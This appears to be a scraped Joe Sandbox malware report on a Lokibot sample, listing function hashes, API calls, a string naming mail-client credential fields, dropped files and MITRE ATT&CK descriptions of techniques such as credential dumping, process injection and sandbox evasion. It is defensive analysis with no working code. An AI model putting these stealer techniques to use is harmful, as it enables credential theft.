Source File: 00000008.00000002.2902710643.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_RegSvcs.jbxd

Yara matches

Similarity

API ID:
String ID: EmailAddress$PopAccount$PopPassword$PopPort$PopServer$SmtpAccount$SmtpPassword$SmtpPort$SmtpServer$Technology
API String ID: 0-2111798378
Opcode ID: 4f23c8655d16a9709c8d74bd686147b8dbb65e0931b573aa619d5bf1b9c89d18
Instruction ID: 091e628055053f5eef329adcdd4db079f25726ad560f051e033024c376855220
Opcode Fuzzy Hash: 4f23c8655d16a9709c8d74bd686147b8dbb65e0931b573aa619d5bf1b9c89d18
Instruction Fuzzy Hash: AE414EB5941218BADF127BE6DD42F9E7F76EF94304F21003AF600721B2C77A99609B48

Function 0040317B Relevance: .0, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2902710643.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_RegSvcs.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5b57611fa40680ed248d57f37b4973e9bad199baf80beacdc2a2503593addd55
Instruction ID: 125f84157e295c2adc52e6f8c9cb261871d96e12da6c9e12f7e31892ee598d11
Opcode Fuzzy Hash: 5b57611fa40680ed248d57f37b4973e9bad199baf80beacdc2a2503593addd55
Instruction Fuzzy Hash: 0B01A272A10204ABDB21DF59C885E6FF7FCEB49761F10417FF804A7381D639AE008A64

Analysis Process: IOsbBBIDAm.exePID: 8056, Parent PID: 1044COMMON

Execution Graph

Execution Coverage:	8.5%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	18
Total number of Limit Nodes:	2

Executed Functions

Function 025A8EFC Relevance: 1.6, APIs: 1, Instructions: 99
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 025A8FB9

Memory Dump Source

Source File: 00000009.00000002.2059052363.00000000025A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_25a0000_IOsbBBIDAm.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: c6b711da76322d897792d3ab4e200d1124d182780173e4936928cd28f0c02e68
Instruction ID: 2a67da4b808da79dc8a7d5d534ead37c0af791bfac358e5c823aa60ef19c8502
Opcode Fuzzy Hash: c6b711da76322d897792d3ab4e200d1124d182780173e4936928cd28f0c02e68
Instruction Fuzzy Hash: 5341EFB0C00719CEDB24CFA9C845BDEBBF5BF48304F2480AAD408AB265DB756985CF94

Function 025A7A8C Relevance: 1.6, APIs: 1, Instructions: 96
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 025A8FB9

Memory Dump Source

Source File: 00000009.00000002.2059052363.00000000025A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_25a0000_IOsbBBIDAm.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: 44b64931486bb30225544dbb7d9908cf240e1ea70052194b5376e8428507393b
Instruction ID: 96762e362fb55be9fe8b94eb43996271f7fc4a47ee4a1636591ad73a70e1b50f
Opcode Fuzzy Hash: 44b64931486bb30225544dbb7d9908cf240e1ea70052194b5376e8428507393b
Instruction Fuzzy Hash: 7641EEB0C00719CFDB24CFA9C845B9EBBF5BF48304F2481AAD408AB255EB756985CF94

Function 025AE698 Relevance: 1.5, APIs: 1, Instructions: 47
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 025AE6FE

Memory Dump Source

Source File: 00000009.00000002.2059052363.00000000025A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_25a0000_IOsbBBIDAm.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 9a04bf8a4c6285ffd36835cb4f43b9e5587fad90224d1dcc36b0a89a0039fc76
Instruction ID: 62ccfef0481f9d6ed5f562ff021d3a10990d9bb2dd77a8464a1a0c896d621e54
Opcode Fuzzy Hash: 9a04bf8a4c6285ffd36835cb4f43b9e5587fad90224d1dcc36b0a89a0039fc76
Instruction Fuzzy Hash: 1A11E0B5D00349CFCB10CF9AD845ADEFBF4BB88324F10886AD559A7210D375A545CFA5

Function 00A6D4C4 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2057824008.0000000000A6D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A6D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_a6d000_IOsbBBIDAm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ef00e3659b4b250a8af55f4ba77cd5198408b18718ac9b7e5f28c7dc314687dd
Instruction ID: 089a5f3b73b0be58e929c82849cb513e68e714c280a10d55b0a0d977dfceade1
Opcode Fuzzy Hash: ef00e3659b4b250a8af55f4ba77cd5198408b18718ac9b7e5f28c7dc314687dd
Instruction Fuzzy Hash: 40212271A00240EFCB05DF14D9C4B2ABF75FB98358F24C569E90A4B656C336D856CAA2

Function 00A7D01C Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2057987190.0000000000A7D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A7D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_a7d000_IOsbBBIDAm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 752b5a1a8b88e1fd2d052d5fa9561f7485a75f5029a2d5b532a9dd4e700486b8
Instruction ID: 0e0f53880e9154028189c96850f0a580838a404455536556fb1c600940d4fb00
Opcode Fuzzy Hash: 752b5a1a8b88e1fd2d052d5fa9561f7485a75f5029a2d5b532a9dd4e700486b8
Instruction Fuzzy Hash: ED21DE75604200EFCB14DF24D984B26BBB5EF88314F24C569E80E4B296C33AD847CA61

Function 00A6D4BF Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2057824008.0000000000A6D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A6D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_a6d000_IOsbBBIDAm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
Instruction ID: fbf951d1b86770d39b6600c675957e623a997611b392040cc7a110cecc0fab3c
Opcode Fuzzy Hash: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
Instruction Fuzzy Hash: 5711D376904280CFCB16CF14D5C4B16BF71FB94318F24C6AAD84A0F656C336D85ACBA1

Function 00A7D017 Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2057987190.0000000000A7D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A7D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_a7d000_IOsbBBIDAm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
Instruction ID: 47a7d75c30f9f2addbc3b22bc2d10e284224db9141eceb1d8841d7a379e4d30b
Opcode Fuzzy Hash: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
Instruction Fuzzy Hash: 33118E75504280DFDB15CF14D9C4B15BB71FB44314F24C6AAD84E4B656C33AD85BCB61

Function 00A6D731 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2057824008.0000000000A6D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A6D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_a6d000_IOsbBBIDAm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dbbb83b47e1b0acb83a11a2bfdd1fcc23b41f6a2f55b4a94a4dd85164f5248f9
Instruction ID: 7abe57eae5a7fc525624a13f851a3d3f7a0096aedc8fe498b0c62a1a683e1572
Opcode Fuzzy Hash: dbbb83b47e1b0acb83a11a2bfdd1fcc23b41f6a2f55b4a94a4dd85164f5248f9
Instruction Fuzzy Hash: 4101F731A083449AE7108B25CD84767BFB8EF40364F18C429ED084E186C238D840C6B2

Function 00A6D730 Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2057824008.0000000000A6D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A6D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_a6d000_IOsbBBIDAm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 32e34756bcfba69aab56d4f6fba6036070285b6049e28c213813131f461a69df
Instruction ID: 6718a8bb02d285ee1fd75bfd6b6e0aa30cdb18f1111847f1ec682ae2ddcf5645
Opcode Fuzzy Hash: 32e34756bcfba69aab56d4f6fba6036070285b6049e28c213813131f461a69df
Instruction Fuzzy Hash: 22F0C2715083449EE7108B16CC84B62FFA8EB90374F18C45AED080E286C2799840CAB1

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search the Registry on compromised systems for insecurely stored credentials. The Windows Registry stores configuration information that can be used by the system or other programs. Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services. Sometimes these credentials are used for automatic logons.
Tactics:	Credential Access
Data Sources:	Command: Command Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report CLOSURE DATE FOR THE YEAR.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Lokibot

Yara Signatures

PCAP (Network Traffic)

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Persistence and Installation Behavior

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_IOsbBBIDAm.exe_f68f7c9fdad1c1ec87bcf3e0d056e688fbbaf9d_3c873a45_2d1111fb-8d04-4797-98f8-4868d602b81e\Report.wer

C:\ProgramData\Microsoft\Windows\WER\Temp\WERA61F.tmp.dmp

C:\ProgramData\Microsoft\Windows\WER\Temp\WERAAD3.tmp.WERInternalMetadata.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WERAB22.tmp.xml

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\CLOSURE DATE FOR THE YEAR.exe.log

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_atmpdfqr.dqc.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hnwe1mub.2ih.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_j3j4rdkp.0z3.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mmovml5y.k2c.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_niez1oms.y1o.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pzd2hhdo.m1b.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rdrfzlhb.5ro.ps1

Windows Analysis Report
CLOSURE DATE FOR THE YEAR.exe

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre